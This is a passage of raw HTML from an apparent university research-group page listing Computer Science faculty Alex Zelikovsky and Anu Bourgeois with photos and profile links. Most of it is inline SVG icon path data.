0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n            <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c29-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c30\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n            <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c35-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c36\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 